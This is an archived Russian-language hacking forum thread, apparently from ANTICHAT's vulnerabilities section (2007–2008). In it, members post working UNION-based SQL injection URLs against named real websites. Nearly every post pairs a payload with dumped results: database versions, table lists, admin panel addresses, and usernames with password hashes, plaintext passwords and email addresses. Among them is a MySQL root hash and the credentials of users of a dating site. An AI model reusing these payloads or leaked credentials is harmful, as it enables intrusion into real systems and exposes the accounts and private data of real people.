ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4271  
Старый 31.12.2007, 17:27
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

www.dmsbg.com

Код HTML:
http://www.dmsbg.com/projects_details_actual.php?id=-32+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database())/*&start=0
4.0.27-log: dmsbg@localhost: DMS
 
Ответить с цитированием

  #4272  
Старый 31.12.2007, 17:45
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

atlant.ws

http://news.atlant.ws/?set=news&mc=readfull&do=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*

5.0.45-log/atlantgr_news/atlantgr_atlantu@localhost


Все таблицы, где есть столбец password
http://news.atlant.ws/?set=news&mc=readfull&do=-1+union+select+1,2,concat(table_name,0x3b,table_sc hema),4,5,6,7,8+from+information_schema.columns+wh ere+column_name=0x70617373776F7264+limit+0,1/*

phpads_affiliates;atlantgr_adv
pmd_admin;atlantgr_firms
bb1_boards;atlantgr_forum
bb1_users;atlantgr_forum
dir_admins;atlantgr_top
dir_editors;atlantgr_top


http://news.atlant.ws/?set=news&mc=readfull&do=-1+union+select+1,2,concat_ws(0x2F,username,passwor d,email),4,5,6,7,8+from+atlantgr_top.dir_admins+li mit+0,1/*

логин/хеш/мейл
admin/e008382c27a5c1cfc5b95131ec55ebc7/admin@atlant-group.com


http://news.atlant.ws/?set=news&mc=readfull&do=-1+union+select+1,2,concat_ws(0x2F,username,passwor d,email,icq),4,5,6,7,8+from+atlantgr_forum.bb1_use rs+limit+0,1/*

логин/хеш/мейл/уин
Atlant Group/e008382c27a5c1cfc5b95131ec55ebc7/atlant-group@yandex.ru/0
 
Ответить с цитированием

  #4273  
Старый 31.12.2007, 18:31
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

4women.ru сайт знакомств


http://www.4women.ru/news/index.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5/*
5.0.41-Dotdeb_1.dotdeb.1-log/bob69_love/borey@localhost


http://www.4women.ru/news/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,name,passw,e mail)+from+bob69_love.love_ankets/*

логин/пароль/мейл ОЧЕНЬ много юзеров ))
Autor_test/magirus/info@spbcar.ru
 
Ответить с цитированием

  #4274  
Старый 31.12.2007, 18:40
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.kraft.org.ua/prod.php?id=-17+union+select+1,2,table_name+from+information_sc hema.tables/*
5.0.41-community
----------------------------------------------------------------------
Цитата:
http://www.oksmodels.com/?module=show_details&model_id=-47+union+select+1,2,3,4,concat_ws(0x3a,login,pass, access),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+reg_users+limit+0 ,1/*
admin
bobak:290772
 
Ответить с цитированием

Abv.bg - самый крупный почтовый портал Болгарии
  #4275  
Старый 31.12.2007, 21:32
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию Abv.bg - самый крупный почтовый портал Болгарии

У меня, собственно, поддомен:
http://poveche.abv.bg/

Код HTML:
http://poveche.abv.bg/kauza.php?id=-1+UNION+SELECT+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10/*&kauza=deca&type=1
4.0.27-log: poveche@localhost: bcaf

Код HTML:
http://poveche.abv.bg/kauza.php?id=-1+UNION+SELECT+1,2,3,4,concat(id,0x3a,username,0x3a,password),6,7,8,9,10+FROM+admins/*&kauza=deca&type=1
1: puhie: puhie05
2: bcaf: 11343910


Админка:
http://www.poveche.net/admin/login.php

С наступающим Новом Годом всех!
 
Ответить с цитированием

  #4276  
Старый 31.12.2007, 22:47
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

ipodhacks.com

Цитата:
http://www.ipodhacks.com/article.php?sid=-2456+union+select+1,2,3,4,concat_ws(0x3a,uname,pas s),6,7,8,9,10,11+from+nuke_users
Тому, кто узнает что это за хэш - +мах x2

Таблицы все те же что и в postnuke, хоть двиг немного и переписанный)

Последний раз редактировалось n0ne; 31.12.2007 в 22:50..
 
Ответить с цитированием

  #4277  
Старый 31.12.2007, 22:51
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от n0ne  
ipodhacks.com



Тому, кто узнает что это за хэш - +мах x2

Таблицы все те же что и в postnuke, хоть двиг немного и переписанный)
Код:
http://www.ipodhacks.com/article.php?sid=-2456+union+select+1,2,3,4,concat_ws(0x3a,uname,pass),6,7,8,9,10,11+from+nuke_users+limit+2,1
--->Тому, кто узнает что это за хэш
Не совсем понял что ты имел ввиду. Что за хеш? DES

blakespot:i3ecrwMoAq/xc:narnia

Последний раз редактировалось Grey; 31.12.2007 в 22:55..
 
Ответить с цитированием

  #4278  
Старый 01.01.2008, 20:03
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

ico.brush.ru

http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*

5.1.11-beta/brush/brush@localhost

Таблицы, где есть столбец password
http://ico.brush.ru/?cl=-1+union+select+1,concat(table_schema,0x3b,table_na me),3,4,5,6,7,8,9+from+information_schema.columns+ where+column_name='password'+limit+18,1/*

alarms;shop_user
bkcbb;ashprojects_users
calibri;users
calibri;users_news
kapitalist;kapitalist_user
luna;admin
mantis;mantis_user_table
mugen;pro_user
mysql;user
nippon;LUM_User
portativ;shop_user
smsina;pro_user
smsina;users
smsina2;pro_user
spbauto;Member
spbauto;pandora_users
starz;mantis_user_table
tvoipolis;pro_user


http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,user,password),3,4 ,5,6,7,8,9+from+mysql.user/*

root/*E372920927493C3BCEA6654A14218A59970A3D11



http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,login,password),3, 4,5,6,7,8,9+from+luna.admin/*

логин/пароль
123alf/123alf


http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,name,password,emai l),3,4,5,6,7,8,9+from+nippon.LUM_User/*

имя/хеш/мейл
Andrey/0134baf25d72d0bdca3d0d1b75e548c1/ye@go.ru
 
Ответить с цитированием

  #4279  
Старый 01.01.2008, 21:29
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.avtoclub-ukr.com/?categoryid=-89+union+select+concat(login,0x3a,pass)+from+users/*
не подходят ((( да и вход какойто идиотский пасс и логин через ГЕТ идут
в http://www.avtoclub-ukr.com/admin/ мас не идёт ((
 
Ответить с цитированием

  #4280  
Старый 01.01.2008, 23:11
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.avtoclub-ukr.com/?categoryid=-89+union+select+concat(login,0x3a,pass)+from+users/*
не подходят ((( да и вход какойто идиотский пасс и логин через ГЕТ идут
----------------------------------------------------------------------
Цитата:
http://www.myminsk.com/catalog/info.php?id=-3318+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2 ,3,4+from+information_schema.tables/*
5-ая
всё слишком запутано и щас сил нету искать ничо .. вот !
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ